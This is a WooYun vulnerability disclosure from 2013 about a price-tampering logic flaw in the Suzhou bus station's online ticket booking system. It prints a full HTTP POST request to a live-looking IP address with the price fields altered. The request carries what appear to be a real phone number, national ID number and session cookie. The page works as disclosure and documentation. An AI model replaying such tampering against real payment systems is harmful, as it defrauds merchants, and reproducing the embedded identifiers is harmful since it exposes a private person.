当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-025016

漏洞标题:汽车客运站网上购票系统价格任意修改

相关厂商:苏州汽车站

漏洞作者: lucky

提交时间:2013-06-03 16:22

修复时间:2013-07-18 16:22

公开时间:2013-07-18 16:22

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-06-03: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-07-18: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

苏州汽车站

http://221.224.77.214:8081/wsdg_suzhou/


1.PNG


修改两个价格参数

POST http://221.224.77.214:8081/wsdg_suzhou/ctsBusSearch.do?formname=ctsBusSearchForm HTTP/1.1
Host: 221.224.77.214:8081
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://221.224.77.214:8081/wsdg_suzhou/ctsBusSearch.do?formname=ctsBusSearchForm
Cookie: JSESSIONID=F56B924E192CE263CB5DA58452B1BAC4
Content-Type: application/x-www-form-urlencoded
Content-length: 502
groupcode=CCC&code=320500201&drive_date=20130603&dst_name=%E5%8D%97%E4%BA%AC&mobile=15972165880&cer_no=370304198411062030&tname=%E6%A2%A6%E7%90%B3&bus_code1=KZ1101&scode=320500201&rcode=320500201&dcode=320100000&available_tickets=24&price=8500&jprice=4300&tprice=4300&yprice=8500&sst_name=%E5%BC%A0%E5%AE%B6%E6%B8%AF%E8%BD%A6%E7%AB%99&rst_name=%E5%BC%A0%E5%AE%B6%E6%B8%AF%E8%BD%A6%E7%AB%99&tst_name=%E5%8D%97%E4%BA%AC&drive_date1=20130603&drive_time=0645&username=lucky735&action=search&city=&event=buy


2.PNG


3.PNG

漏洞证明:

修复方案:

版权声明:转载请注明来源 lucky@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝